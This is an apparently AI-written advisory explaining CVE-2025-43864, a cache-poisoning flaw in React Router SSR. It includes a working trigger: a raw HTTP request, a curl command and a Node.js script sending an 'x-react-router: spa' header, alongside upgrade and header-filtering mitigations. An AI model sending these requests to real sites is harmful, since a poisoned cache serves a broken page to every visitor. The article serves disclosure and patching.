CVE-2025-43864 - React Router SSR Cache Poisoning Vulnerability Explained

Summary:
In the world of modern web apps, *React Router* is a vital tool for handling navigation in React projects. However, a newly discovered vulnerability, CVE-2025-43864, poses a major risk to developers using server-side rendering (SSR) with React Router versions from 7.2. up to, but not including, 7.5.2. This exploit allows attackers to force a site into single-page application (SPA) mode with a simple HTTP header, potentially crashing the site and poisoning its cache, making recovery difficult.

What is the React Router Vulnerability?

React Router lets you decide if you want client-side navigation (SPA) or server-side rendering (SSR). By default, apps pick the right mode based on headers from the browser.

Starting with version 7.2., a new behavior opened the door to abuse: by sending a specially crafted request with a custom HTTP header, attackers can force the app to switch to SPA mode even when it should be using SSR. When this happens, SSR-specific context is lost and React Router throws a fatal error. This is bad enough, but when the error response gets cached (for example, by Varnish, Redis, or other CDN caches), every user gets served the broken page.

1. The Attack

An attacker sends a request to a route normally rendered via SSR, but adds a special x-react-router header:

GET /important-page HTTP/1.1
Host: example.com
x-react-router: spa

React Router sees this header and switches to SPA mode—even in an environment meant for SSR. Now, the rendering process fails and an error page is generated.

2. Cache Poisoning

If the server uses an HTTP cache, it saves this broken response. Now, every subsequent visitor who requests /important-page gets the corrupted page, not the expected content. This is classic cache poisoning and hurts the availability of the app.

Here’s a simple curl command that can trigger the vulnerability

curl -H "x-react-router: spa" https://victim-site.com/sensitive-ssr-route

If you try this on a vulnerable site and it uses SSR + has a cache layer, you might break the page for everyone for as long as the cache lives.

Node.js demonstration

const https = require('https');

const options = {
  hostname: 'victim-site.com',
  path: '/profile',
  headers: {
    'x-react-router': 'spa'
  }
};

https.get(options, res => {
  let data = '';
  res.on('data', chunk => data += chunk);
  res.on('end', () => {
    console.log(data);
  });
});

Difficult recovery: Cache might serve the error for hours.

## How to Fix / Mitigate

- Update React Router to 7.5.2 or later immediately. NPM changelog
- If you have to stay on an old version, reject or ignore headers like x-react-router for public traffic.

References & More Reading

- React Router 7.5.2 release notes
- GitHub Advisory (GHSA)
- OWASP: Cache Poisoning
- NPM: react-router

Patch now to version 7.5.2 or higher and clear your cache after updating.

Stay safe—keep your dependencies updated and be aware of how HTTP headers can influence your app's behavior.


*This article is original content by AI, prepared based on the latest information about CVE-2025-43864. Please verify all details and test in your own environment.*

Timeline

Published on: 04/25/2025 01:15:43 UTC
Last modified on: 04/29/2025 13:52:28 UTC